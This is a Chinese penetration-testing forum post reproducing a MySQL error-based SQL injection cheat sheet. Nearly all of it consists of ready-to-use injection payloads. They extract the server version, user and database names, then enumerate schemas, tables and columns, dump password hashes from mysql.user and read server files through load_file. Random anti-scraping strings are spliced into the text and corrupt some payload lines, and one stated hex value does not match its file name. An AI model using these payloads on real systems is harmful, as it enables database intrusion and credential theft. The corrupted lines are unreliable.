中国网络渗透测试联盟

标题: Mysql暴错注入参考（pdf） [打印本页]

---

作者: admin    时间: 2013-7-27 11:00
标题: Mysql暴错注入参考（pdf）
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
2 |1 k7 o' P% I" U3 {. ?
6 b, x7 {4 e8 h8 l: f
Mysql暴错注入参考（pdf），每天一贴。。。
' R" F4 S9 M$ p, f) Z# T
MySql Error Based Injection Reference
. }3 O5 [6 @2 w1 p% {* o) N[Mysql暴错注入参考]
. V  j: R+ h: qAuthornig0s1992
6 L3 _5 ^' n& bBlog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
* q2 r) Q* `! E' b7 Q小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
! `, n- n6 M! x& {Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
* i( a+ }$ o4 k. z- R( ljoin+(select+name_const(@@version,0))b)c)
8 m' Z5 \! {2 v4 S3 ]Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
- J6 [; l8 L+ ?. J/ m$ v查询当前用户:
/ @8 k5 @1 B* f; q2 }Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
& e5 O2 r. i1 A2 @7 F% D查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
' I2 d+ p4 y- j: x) ~Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
6 p! }) [" @. Sor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
# l  Z5 }4 Z9 J& C1 i依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
顺序替换
爆指定库数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
) H" e/ @7 A: Vable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+ K3 E4 r7 h  C) u8 Y& v+by+x)a)+and+1=1 0x6D7973716C=mysql
' u: t* Z' i8 t# L依次爆表:
; i* m# f# }. B) ]3 band+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
8 f. [. O7 n$ A1 k+ T8 A& v& Sable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
5 s2 H8 ?' y4 m4 S4 y" [9 v0x6D7973716C=Mysql 将n顺序替换
爆表内字段数目:
2 P! d7 l# c) a5 C1 iand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
+ h+ A9 g( H+ J) p# M, b0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
" a" S' p' X9 e# @4 G8 x& N+ t8 N依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
* q! l& M1 i$ W# w! xma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
6 G0 O7 }1 G* ?; W: {将n顺序替换
爆文件内容:
" T8 v0 S; M( c1 D; \: e# Fand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
6 g$ N/ O, H/ E3 U, u9 {8 a( bfrom+information_schema.tables+group+by+a)b)
' t+ s$ s' r; O9 D5 n: x2 |0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
* ?- E* g$ U* O- R4 x) FThx for reading.
  S2 n. D  N  q; t$ t
不要下载也可以，

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2